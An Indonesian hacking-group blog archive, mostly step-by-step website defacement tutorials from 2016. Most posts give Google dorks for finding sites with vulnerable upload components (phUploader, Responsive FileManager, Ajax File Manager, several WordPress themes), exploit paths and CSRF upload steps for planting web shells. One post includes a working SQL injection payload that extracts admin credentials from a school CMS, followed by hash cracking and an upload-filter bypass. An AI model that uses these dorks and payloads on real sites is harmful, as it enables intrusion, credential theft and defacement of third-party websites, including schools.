Monday, August 15, 2016

Deface Dengan phUploader Vulnerbility File Upload

Deface Dengan phUploader Vulnerbility File Upload

Garuda Security Hacker
Masih Misteri :v

Lagi Lagi, E7B_404 iseng dorking terus di share di grup :v setelah ane sek ternyata POC nya masih ok kok, terus ane coba notif di defacer.id, dan ternyata sukses.. tanpa pikir panjang ane langsung share ini Tutorial "Deface Dengan phUploader Vulnerbility File Upload". memang cuma upload file .txt sih tapi lumayan bisa masuk ke beberapa mirror. simak aja dah tutorialnya..

Bahan-Bahan :

Dork Google :
# intitle:Powered by phUploader
Kembangkan lagi ya mblo :v

File Text kalian..
Kalo pengen variasi pakai text to ASCII aja cari di gugel.

Step by Step :

1. Dorking lah di gugel seperti biasa.

2. Pilih target yang soleha, rajin sholat, pandai masak :v

3. Setelah terbuka kalian akan langsung masuk ke Form Upload File nya

Deface Dengan phUploader Vulnerbility File Upload
Maklumin aja bahasanya :v
4. klik browse lalu pilih file text kalian.

5. lalu kalian klik tombol upload, itu kan ada 2 tombol yang kiri biasanya tombol upload

Deface Dengan phUploader Vulnerbility File Upload

 6. Setelah sukses akan muncul url bokep kalian..

Deface Dengan phUploader Vulnerbility File Upload

 7. Aksesnya tinggal klik aja Url nya, klo ga bisa di klik, ya Use Your Brain

8. Selesai,, terserah mau di apain setelah itu :v

Thanks To : E7B_404 (Ketua Team Riset)

Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lynoc | E7B_404 | ./Zero*Angel | ML7C | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | D34D_SL33P |

Use Your Brain :)

Laporan Link Rusak  : Klik Disini

Daftar Tutorial Deface : Klik Disin

Friday, August 12, 2016

Cara Akses Shell/Script di CMS Open Journal System

Cara Akses Shell/Script di CMS Open Journal System


Cara Akses Shell/Script di CMS Open Journal System

Banyak amat yang nanya cara akses shell di OJS gmna ?? plis bantuin dong -_- Cape Dehh..
Mainkan Logika Kalian Bung !! Jangan terlalu manja,, gmna mau berhasil kalo manja gitu ??
Kurang baik apa gw, sampe buatin tutorial sedetail ini.. sbner nya gw ada rasa males tersendiri.. tapi dari pada gw di todong terus dengan pertanyaan "Cara Akses Shell Di OJS??" mending gw buat beginian, tapi setelah ini gw kaga bakal ngejawab pertanyaan tentang ini. CAMKAN !!

Step by Step :

1. Baca Tutorial ini dlu buat yang belum ngarti cara deface OJS : Deface Dengan Open Journals System Arbitrary File Upload

2. Setelah kalian pilih-pilih target.. kalian jangan langsung register + tanam shell... Kalian periksa dahulu apakah direktori tempat shell kalian nanti ada atau engga..

3. Cara cek nya simple, cukup tambahkan /files di belakang url target kalian contoh : http://target.tai/files

Cara Akses Shell/Script di CMS Open Journal System
Bisa Vuln Bisa Tidak.

Cara Akses Shell/Script di CMS Open Journal System
Not Vuln

Cara Akses Shell/Script di CMS Open Journal System
This Vuln

4. Kalo udah vuln kaya gambar ke 3 (kurang lebihnya), baru kalian mulai register... kalo kaga tau cara register dan tanam shellnya baca di artikel : Deface Dengan Open Journals System Arbitrary File Upload

5. Setelah tanam shell berhasill, kalian balik lagi ke direktori files, kaya contoh di atas (gambar no.3), lalu kalian klik direktori journals -> (angka-angka) pas bagian situ mungkin ada direktori angka yang lebih dari 1 -> ke direktori articles -> direktori id user kalian (angka, baca di tutrial deface ojs) -> lanjut ke direktori submission -> lanjut lagi ke direktori original -> nama file kalian.

6. Selesai !!

Warning !!
Setelah tutorial ini gw kaga bakal jawab pertanyaan apapun tentang Deface Open Journal System, terserah kalian mau bilang gw sombong,, gw cape klo harus jelasin berkali kali. Hargai Orang !!

Regard : _Tuan2Fay_


Laporan Link Rusak  : Klik Disini

Daftar Tutorial Deface : Klik Disini

Wednesday, August 10, 2016

Deface Dengan Responsive FileManager

 Deface Dengan Responsive FileManager

 

Deface Dengan Responsive FileManager
Masih Misteri :v

Biasa,, lagi iseng iseng dorking nemu file terus ane klik,, ternyata semacam file manager lebih tepatnya : "Responsive FileManager" file manager nya juga udah kaga asing bagi ane.. ane pernah liat saat exploiting Popoji CMS (web sekolah sendiri, sebelum exploit itu tenar dimana2). eh ternyata ane keduluan sama E7B_404 , yang lebih dlu tau exploit ini, terus ane kembangin lagi dorknya aja... ok deh simak aja Tutorial nya.. "Deface Dengan Responsive FileManager"

Bahan-Bahan :

Dork :
  1. inurl:/filemanager/ intext:"dialog.php"
  2. inurl:/js/filemanager/ intext:"dialog.php"
  3. inurl:/assets/filemanager/ intext:"dialog.php"

Exploit (File yang terinfeksi/bisa di exploit) :
dialog.php
example : www.targetsuka.co.li/filemanager/dialog.php

Script Pepes
klo belum punya bikin atau colong punya orang

Step by Step :

1. Seperti biasa,, dorking adalah hal wajib.. dorking di gugel pake dork di atas (saya pakai dork no.1)

2. Pilih target nyaa..

Deface Dengan Responsive FileManager
Klik dialog.php

3. Setelah klik dialog.php kalian akan beralih ke Responsive FileManager

4. Cari aja tombol upload di pojok atas kiri (biasanya di situ)

Deface Dengan Responsive FileManager
Klik aja.

5. Setelah itu kalian klik lalu pilih script deface kalian

6. Jika sukses hasilnya seperti ini..

Deface Dengan Responsive FileManager
Ada tanda ceklis berwarna hijau
7. Untuk aksesnya kalian.. kembali dlu ke awal Responsive FileManager nya (klik tombol hitam di atas) lupa gw tandain :v

8. Klik kanan pada file yang telah kalian upload tadi,, lalu pilih Show URL

Deface Dengan Responsive FileManager

9. Kalian Copy url nya terus paste di address bar browser kamu.. dan jrengg-jrengg..

10. Nitip nick boleh kali ?? _Tuan2Fay_

11. Nitip nama Garuda Security Hacker boleh kali ??


Note : Copas Boleh. Izin dlu lewat komentar di artikel ini dan Sertakan Link Sumber (Link Aktif)
Hargailah karya orang lain !!

Bila Ada Pertanyaan silahkan berkomentar !!

Grup FB (Forum Diskusi) : Garuda Security Hacker - Grup

Greets :
| _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lynoc | E7B_404 | ./Zero*Angel | ML7C | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | D34D_SL33P |

Learning And Actions !!

Laporan Link Rusak  : Klik Disini

Daftar Tutorial Deface : Klik Disin

Monday, August 8, 2016

Deface Ajax File Manager [Fresh Dork]

Deface Ajax FileManager [Fresh Dork]

Deface Ajax File Manager [Fresh Dork]

Banyak orang-orang yang melupakan teknik pepes yang satu ini, mungkin mereka pikir target nya kaga fresh atau mereka anggap teknik ini sudah mati karena target nya kaga perawan di notif ?
Notif-Notif dan Notif yang mereka kejar padahal sih santai aja..

Deface Ajax File Manager [Fresh Dork]
E7B_404

Bahan-Bahan :

# Dork :
  1. intitle:"Ajax File Manager" site:au
  2. inurl:/ajaxfilemanager.php intext:"/Root Folder"
  3. inurl:/ajaxfilemanager.php intext:"upload"
  4. inurl:/ajaxfilemanager.php .ac.
  5. intitle:"index of" intext:"ajaxfilemanager.php"
Kembangkan Lagi Dengan Otak Hentai yang kalian miliki !!! :v (Peace !)
Note : site: boleh di ganti dengan domain atau di hapus

# File txt yang mau di upload
Kalo mau keren pake ASCII aja : klik disini

Step by Step :

1. Sebagai Contoh gw pakai dork yang ke 5. lalu seraching di gugel

2. Setelah sekian lama milih target, gw dapet 1 yang perawan..

Deface Ajax File Manager [Fresh Dork]
Penampakan saat pertama kali buka target nya..

3.  Setelah gw klik tuh file ajaxfilemanager.php, gw langsung berubah jadi power ranger pink !!!!

4. Setelah masuk ke Ajax File Manager nya, kalian klik tombol upload di pojok kanan atas..

5. Pilih file .txt kalian...

Deface Ajax File Manager [Fresh Dork]

6. Setelah berhasil upload akan mucul nama file kalian..

7. Akses file nya gmna ?? ini akan sedikit memakan emosi, energi jiwa dan raga, !! persiapkan mental kalian. :v

8. Arahkan Cursor kalian ke gambar icon file yang telah kalian upload.. (liat gambar)

Deface Ajax File Manager [Fresh Dork]
Di pojok kiri bawah ada link file nya

9. Di Pojok kiri bawah mucul lah link file kalian,, tinggal kalian pikir bagaimana akses nya :v
mau di ketik manual boleh.. mau di diemin juga boleh :v

Ok !! Sekian dlu Coeg.. nanti gw update lagi.. karena gw juga banyak urusan di sekolah..


Big Thanks to : E7B_404 - Garuda Security Hacker

Quote From E7B_404 : "Tak Ada Poc Basi Yang Ada Otak Anda Basi"


Laporan Link Rusak, Mati, atau Error : Klik Di Sini

Punya Kritik dan Saran ??? Atau Keluhan ?? Hubungi Kami :) 

Saturday, August 6, 2016

[Download] Modul Debian 6 (Squeeze) Server Configuration

Modul Debian 6 (Squeeze) Server Configuration

Modul Debian 6 (Squeeze) Server Configuration

Karena ane sibuk tugas sekolah ane juga kaga tau harus update apa, mumet juga dah kelas 11 tugas makin numpuk. ane iseng copy file module di PC Lab sekolah ane, ane juga lagi belajar "Debian 6 Server" buset tuh CLI yang memusingkan kaga ada gambar ini itu, apa lagi gambar hentai -_-.
Buat kalian yang anak TKJ ane kasih modul pembelajaran soal "Debian 6 Server (Configuration)"
format file nya .docx bukan pdf..

Daftar isi :

  • DNS Server Configuration
  • Web Server
  • Mail Server Configuration
  • FTP Configuration
  • DLLC (dan lain lain coeg)
Link Download :
Modul Debian 6 (Squeeze) Server Configuration

Wednesday, August 3, 2016

Deface WordPress Theme Exploit (Vulnerbility CSRF)

Deface WordPress Theme Exploit (Vulnerbility CSRF)

Deface WordPress Theme Exploit (Vulnerbility CSRF)

Lagi-lagi wordpress, tema-tema wordpress memang selalu mewarnai khasanah perexploitan (si anjirr), entah dari tahun berapa itu tema nya.. bug nya selalu belum di tutup -_-. Waspadalah para penguna WordPress. ceritanya gini : ane lagi jalan-jalan di gugel ngetik keyword dengan tutorial yang "Deface SQLi Schoolhos CMS" ketemu lah beberapa tema wordpress yang vuln CSRF karena tema nya kaga cuma satu, ane juga bingung namain judul artikel ini, ya sudahlah alakadar nya aja. simak deh tutorial "Deface WordPress Theme Exploit (Vulnerbility CSRF)". cek the crots :v

Bahan-Bahan :

1. Dork (ada lebih dari satu :v)
# inurl:/wp-content/themes/shepard/
# inurl:/wp-content/themes/money/
# inurl:/wp-content/themes/clockstone/
# inurl:/wp-content/themes/ambleside/
# inurl:/wp-content/themes/pacifico/

2. Exploit (lebih dari 1 juga -_-)
# /theme/functions/upload-bg.php
# /theme/functions/upload.php
# /theme/functions/uploadbg.php

3. CSRF Online : Touch She Oppai :v (Postname nya : uploadfile)

Step by Step :

1. Dorking lah kalian menggunakan dorking gambar (gugel gambar tau kan?)

2. Pilih Gambar nya deh... tunggu loading selesai setelah itu klik kanan -> Copy Image Location -> New Tab -> paste url dan go. (kalo di chrome bisa langsung open image in new tab klo kaga salah)

3. Masukan exploit di url si korban contoh : http://targetopgaza.co.li/wp-content/themes/namatemadiatas/theme/functions/upload-bg.php (coba aja exploit yang di atas satu-satu)

4. Vulnerbility ?? ada tulisan "_Tuan2Fay_ ganteng :v" Vuln : error

5. Buka CSRF Online nya.. masukan url target ke liang kubur, postname nya uploadfile, klik next upload file kalian..

6. Jika sukses akan ada nama random shell kalian. Look the Picture Hentai :v

Deface WordPress Theme Exploit (Vulnerbility CSRF)
Nanem Shell Backdoor di hati cewe nya kapan ? :'(

7. Akses Shell ?? Tanyakan pada oppai yang bergetar :* 

8. Akses : http://fakeangkot.taxi/wp-content/themes/namatemayangdiapakai/theme/functions/namarandomshellkalian.php

Note : Copas ? boleh tapi izin di komentar dan sertakan sumber link postingan ini !! kemaren nemu lagi 2 blog yang copas artikel ketikan ane tanpa sertakan sumber apa lagi izin -_- (Persetan Haters Transparan Seperti Kalian)

Membacalah !! Cermatilah !! Pahamilah !! Praktekan !!

Laporan Link Rusak  : Klik Disini

Daftar Tutorial Deface : Klik Disin

Sunday, July 31, 2016

Deface SQLi Schoolhos CMS

Deface SQLi Schoolhos CMS

 

Deface SQLi Schoolhos CMS

Lagi lagi CMS yang banyak di gunakan website sekolah memiliki BUG, setelah Balitbang, Popoji CMS.. Nanti apa lagi yah ?? Kali ini bukan tentang Baltibang atau Popoji CMS melainkan "Schoolhos CMS" mungkin CMS ini belum sempurna makanya masih memiliki BUG yang Cukup beresiko !! simak langsung aja tutorial "Deface SQLi Schoolhos CMS"


Bahan-bahan :

1. Dork :
# inurl:"/?p=info" site:id
# inurl:"/?p=detberita"
# inurl:"/?p=guru" site:id
kembangkan lagi dengan otak hentai kalian :v

2. SQL Injection (Exploit SQL)
' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+

3. MD5 Hash Decrypter : https://hashkiller.co.uk/

Step by Step :

1. Dorking di gugel (jangan dorking gambar coeg)

2. Pilih target kamu

3. Masukan Exploit (SQL Injection) contoh : http://targetkamu.domain/?p=detberita&id=5' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+

Deface SQLi Schoolhos CMS

4. Kalo vuln akan muncul username dan password nya.

Deface SQLi Schoolhos CMS

Note : itukan setelah admin ada angka-angka contoh : admin20160407 nah si angka 20160407 abaikan aja.

5. Copy MD5 Hash tadi, lalu kamu buka MD5 Decrypter tadi. kamu masukan di situ. hash yang tadi.

6. Setelah selesai di hash kamu login ke panel admin. lokasinya : http://targetkamu.domain/adminpanel/

7. Masukan username dan password yang kamu dapat tadi..

8. Lanjut !! mau tanam shell ?? kamu tinggal ke menu Berita, Informasi, Album Galeri.

9. Rename dlu shell kamu dari shell.php jadi shell.php.jpg

10. Setelah itu pilih shell kamu lalu gunakan tamper data..

11. Ganti nama shell kamu dari shell.php.jpg jadi shell.php (ganti pas di tamper datanya)

Note : tanam shell dan akses shell nya sama kaya Lokomedia kok.

Warning ! : Karena yang menggunakan CMS ini adalah web sekolah.. saya mohon jangan terlalu berlebihan mengexploitnya. Dan jangan juga tebas index malu om sama total archive defacean kamu.
Apalagi bawa-bawa nama Indonesia dan blabla. Pengen tenar ?? kaga usah show off defacean web sekolah.. kalo gw liat sih bakal gw ketawain.

Thanks to : Febru4ry - GooBlog

Notif Banyak Kaga Di Bayar, Ranking Naik Kaga Otomatis Master !!

Laporan Link Rusak  : Klik Disini

Daftar Tutorial Deface : Klik Disi

Saturday, July 30, 2016

Deface WordPress Theme Kiddo Uploadify

Deface WordPress Theme Kiddo Uploadify

Deface WordPress Theme Kiddo Uploadify

Berbicara Tentang Celah Keamanan Website, WordPress lah yang paling banyak mewarnainya :v
Entah dari sisi Tema, Plugin, dan lain-lain.
artikel tutorial "Deface WordPress Theme Kiddo Uploadify" memang termasuk bug lama, tapi ketika saya coba exploit target dengan hanya 1x pilih ternyata langsung vuln :o (Hokinya seorang jomblo)
Ok simak deh tutorialnya.

Bahan-Bahan.

1. Dork :
inurl:"/wp-content/themes/kiddo/"

2. Exploit : /app/assets/js/uploadify/uploadify.php

3. CSRF. karena CSRF kami sering berpindah url jadi maklumin saja namanya juga CP orang :v
jadi saya kasih CSRF biasa aja ya.
tenang aja ntar di kasih tau cara pakainya

4. Pacar kalo kaga punya jangan di paksain :'( (I'm fine !!)

Step by Step :

1. Dorking dulu di gugel pakai dork di atas (terserah dorking biasa atau gambar)

2. Pilih target yang kamu anggap cocok untuk di ambil keperawanannya.

3. Masukan Exploit (klo bingung liat gambar)

Deface WordPress Theme Kiddo Uploadify
Yang Di Kotak Merah adalah target yang sudah di exploit
4. Vuln ?? Seperti biasa Uploadify rata2 blank

5. Copy/Download CSRF di atas save dengan format html contoh : csrf.html !! buka/edit di notepad.

6. Ganti di bagian url nya dengan url target kamu yang vuln setelah di exploit

Yang di kotak merah ganti dengan target kamu
7. Setelah itu save formatnya tetap html, lalu buka CSRF nya (buka dengan browser, Mozilla atau Chrome)

8. Klik browse lalu pilih file kamu lalu klik ambil perawan

9. Jika file selesai/sukses di upload hasilnya seperti ini. (lihat gambar)

Deface WordPress Theme Kiddo Uploadify
Note : kaga mesti nama sih, bisa jadi cuma muncul anggka 1

10. Access shell : http://target.co.li/namafile.php

Selesai :) Mohon maaf ya CSRF online nya lagi dalam perbaikan -_-

Like Juga ya, Fanspage kami :*


Stay Tune and Keep Learning :) See You

Laporan Link Rusak  : Klik Disini

Daftar Tutorial Deface : Klik Disi

Garuda Security Hacker Open Soruce (Terbuka Untuk Yang Ingin Join)

Garuda Security Hacker Open Soruce (Terbuka Untuk Yang Ingin Join)

Garuda Security Hacker Open Soruce (Terbuka Untuk Yang Ingin Join)

Garuda Security Hacker ?? Bang Boleh join GSH gak ?? bang cara join GSH gmna bang ?? pertanyaan itu sering masuk entah lewat email saya lewat, fb saya atau lewat Fanspage.. -_-

Sebenarnya Garuda Security Hacker itu Open Source (kaya linux :*) siapa pun boleh gabung karena kami kelompok belajar :) Tapi di sini kami juga mengharus kan member untuk aktif dalam menuntut ilmu dan juga kesetian !!!
Kami juga ga mau klo kalian masuk cuma sebagai kutu loncat, nyari Informasi tentang keberadaan kami atau cuma belajar abis dapet ilmu banyak kabur lagi. dan itu pun banyak kejadian.
Kami juga tidak mengizinkan anggota nya memiliki tim lebih dari satu (Multi Team) karena akan menggangu konsentrasi kalian. Lalu kalian yang multi team bisa di anggap mata-mata oleh member GSH yang lain dan nanti nya yang ada akan membawa kalian kedalam masalah yang memberatkan kalian sendiri dan tentu saja siap-siap kena kacangin, bully massal dan di kick.

Nih yang Penasaran Dengan Garuda Security Hacker atau Pengen Bergabung. Ada Beberapa syarat pokok dan syarat Sunnah nya :v

Syarat Pokok :

1. Mengerti IT (walau cuma dasarnya)
2. Minat Belajar Tinggi
3. Kaga Manja !
4. Tidak Multi Team
5. Bukan Kutu Loncat.
6. Setia Terhadap Garuda Security Hacker
7. Aktif dalam Tim.
8. Memiliki Skill/Bakat yang ingin di asah

Syarat Sunnah :

1. Mengerti Webserver
2. Bisa Defacing
3. Bisa Hacking
4. Mengembangkan Tools (dalam bentuk apapun)
5. Jika kalian bergerak di bidang deface minimal sudah 10x tebas Index
6. Jika kalian bergerak di bidang hacking minimal ngerti Dasarnya CMD dan Terminal Linux

Ada Lagi Yang Lain ? :

ya bisa dibilang ini cuplikan dari beberapa hal di Garuda Security Hacker

1. Kami memiliki tradisi tersendiri jika ada member yang merusuh dan banyak bacod kami membully yang bersangkutan terlebih dahulu kemudian kami kick.

2. Kami Tidak Butuh "Teman Musiman" dan "Pahlawan Kesiangan" yang muncul nya pada saat-saat di masa enak nya saja dan selalu menghilang pada masa-masa sulit.

3. Ya GSH tidak peduli dengan panggilan atau gelar Newbie, Mastah, Suhu dan Bocah yang jelas jika member ada kendala kami bantu semampu nya.

4. Ketika ada masalah internal maupun external kami selalu melakukan musyawarah dan tentu nya pihak yang bermasalah wajib memberikan bukti Pendukung, Forensic dan Screenshoot nya.

baiklah jika kalian tertarik ingin bergabung pastikan kalian membaca artikel ini baik-baik dan pikirkan matang-matang.

jika sudah yakin silahkan kontak kami langsung

Like Juga ya, Fanspage kami :*


Stay Tune and Keep Learning :) See You

Friday, July 22, 2016

Deface WordPress Theme ThisWay Arbitrary File Upload

Deface WordPress Theme ThisWay Arbitrary File Upload

Deface WordPress Theme ThisWay Arbitrary File Upload
Quote Di Gambar Untuk Penyemangat

Ok, Assalamualaikum.. Udah pada lama ya nunggu tutorial deface ?? :v Kasian.. karena saya juga nyari exploit apa yang masih bisa di gunakan. Pas lagi jalan-jalan di Blog TKJ Cyber Art nemu exploit ya masih bisa di pake walaupun udah lawas.. yaitu "Deface WordPress Theme ThisWay Arbitrary File Upload". Ok langsung intip tutorialnya yak :p

Bahan-Bahan :

1. DVD Hentai (yang HD)

2. Dork :
inurl:"/wp-content/themes/ThisWay/"

3. Exploit  /includes/uploadify/upload_settings_image.php


Step by Step :

1. Dorking di gugel, kalo saya sih pakai dorking image :p

2. Pilih targetnya,, setelah itu masukan exploit, contoh : http://tumbal.co.li/[path]/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php

3. Kalo Vuln akan seperti ini (liat gambar cuk, gambar hentai nih)

Deface WordPress Theme ThisWay Arbitrary File Upload
Vuln nih :)
 4. Copy url target :v lalu buka csrf yang udah di kasih di atas. masukan urlnya postname biarkan Filedata, klik next, lalu upload shell kalian
Note : jika tidak bisa shell.php coba shell.phtml

5. Jika berhasil upload hasilnya akan seperti ini

Deface WordPress Theme ThisWay Arbitrary File Upload
Sebaiknya catat nama shell kalian
6. Akses shellnya. http://tumbal.co.li/wp-content/uploads/tahun/bulan/settingsimage_random.phtml

7. Jreng jrengg, kalo mau nebas index.php sebaiknya backup dulu ya :p bug nya jangan lupa di tutup.

Source : TKJ Cyber Art

Thanks To :

ALLAH SWT. : atas segala-galanya

Kedua Orangtuaku : atas segala-galanya

TKJ Cyber Art : atas tutorial dan motivasinya

Yukinoshita 47 : atas ilmu-ilmunya

Drach Levia (nama aliasnya banyak) : atas mahakarya nya :v

Like Juga ya, Fanspage kami :*


Stay Tune and Keep Learning :) See You

Thursday, July 21, 2016

Realita Keanehan Dunia Underground

Realita Keanehan Dunia Underground

Realita Keanehan Dunia Underground

Cieee,, yang tim nya underground ?? Cieeeee, yang dirinya pengen tenar :v
Ok ini ada sedikit artikel kisah nyata yang sedang Ramai di Dunia Underground :) Ini Juga Kelanjutan dari artikel Realita Pahitnya jadi Seorang Researcher yaya, mungkin tidak akan berbeda jauh dengan artikel sebelumnya, tapi ini sedang marak di lakukan oleh orang-orang underground :v

Seperti di artikel yang di buat guru saya Yukinoshita 47 : Realita Amburadulnya Dunia Underground - Bitosi.com dunia Underground itu memang kacau dan aneh.
Salah satu keanehannya adalah "Bangga Dengan Hasil Yang Mereka Raih Dengan Curang"

Tidak Sedikit orang-orang yang berusaha mengejar Ranking dengan cara curang.. saya akui saya sendiri pun pernah melakukannya dengan create subdomain, ya kalo 1,2,3 atau 4 sih anggap aja bonus :v yang kalo udah sampe Ratusan bahkan Ribuan nah itu sudah berlebihan dan Fake Notif :o

Ya Memang Ranking Pribadi atau Ranking Team mereka naik secara drastis, tapi yaa mereka akan selalu di kritik oleh orang lain yang masih bertahan dengan kejujurannya (aseeekk).
Ranking naik tapi skill mereka 0 (nol) besar !!! Kenapa ? Karena mereka hanya mengejar Ranking bukan mengasah skill dan mencari ilmu.

Ya lebih baik punya sedikit hasil tapi murni (jujur) dari pada ribuan hasil tapi tidak murni (curang). Awalnya saya sendiri begitu, hanya punya sedikit Hasil, tapi saya terus berjuang, sampai akhirnya perlahan skill saya terasah & otak vokepers saya semakin tajam :v , Lalu banyak haters dari dunia Underground bermunculan, tapi banyak juga Fans-Fans saya (halo para fans :* muaacchh). Dan Semakin banyak orang yang terus mendukung saya..

Kalian Pengen Tenar ?? Bukan dengan cara curang seperti itu !! Contoh TKJ Cyber Art. Mereka Tenar karena mereka senang membagi ilmu kepada siapa pun, mereka terkenal dengan sendiri nya karena orang2 memandang mereka orang yang baik, yang rela membagi ilmunya :)

Intinya gini deh, Hatimu akan lebih merasa puas dan bangga bila meraih suatu hasil dengan cara yang murni dan jujur, Apalah sebuah arti "Tenar" di bandingkan ilmu yang kamu dapat.
"Keep Learing and Sharing :)"

Jika ada yang tidak suka atau tersindir dengan Artikel saya silahkan komentar atau Message saya langsung di Facebook.

Oh iyaa, pesan cantik nih yang suka copas artikel ASLI KETIKAN ANE !
"Copas Artikel ?? Boleh ?? tapi saya minta kalian untuk menghargai karya saya, dengan sertakan link aktif artikel yang saya tulis, dan juga Izin Terlebih dahulu jika ingin menjiplaknya, karena jika saya benar2 tidak terima Blog/Website anda bisa saya laporkan ke DMCA loh ?"

Realita Keanehan Dunia Underground

Tuesday, July 19, 2016

Pengertian Tentang Arbitrary File Upload

Pengertian Tentang Arbitrary File Upload

Pengertian Tentang Arbitrary File Upload

Yapp, banyak yang bertanya Arbitrary File Upload itu apa ?? ajarin dong kaka ?? haha, kalian sering gunakan tapi kalian tidak paham, kan aneh -_- . Makanya saya kasih sedikit Pengertiannya ok

Apa Itu Arbitrary File Upload ?

Arbitrary File Upload adalah memanfaatkan celah pada sistem yang memungkinkan kita untuk mengupload sebuah file. File itu bisa berupa gambar, shell backdoor, script HTML, dan lain lain.

Penjelasan :

Arbitrary File Upload ini hampir ada di semua teknik defacing, Exploit nya adalah File Upload, entah itu berbentuk Uploadify, Upload Gambar, Plupload, Fupload dan lainnya.

Kalian hanya memakain exploit dan teknik defacingnya saja tanpa memahami struktur bug dan tanpa mempelajari seninya. Kalian hanya tau nama berdasarkan judul tekniknya saja.

Arbitrary File Upload sendiri mencakup berbagai macam tipe, seperti yang saya sebutkan di atas Uploadify dan lain-lain. Arbitrary File Upload bisa di temukan secara random, Sulit untuk membuat dork akurat jika kalian tidak pandai seni dorking :(
Sebagai Contoh Dork : intitle:"File" intext:"upload" ext:php
Ada ribuan Website yang memiliki bug nya tersendiri, saking randomnya kalian bisa ketemu dengan website hosting gambar :v

Ok Sekian Dulu "Pengertian Tetang Arbitrary File Upload" semoga kalian dapat motivasi untuk semangat mempelajari hal-hal yang jarang di lakukan orang biasa. Makanya saya di sebut sedikit aneh oleh orang-orang di luar sana :v

Like Juga ya, Fanspage kami :*


Stay Tune and Keep Learning :) See You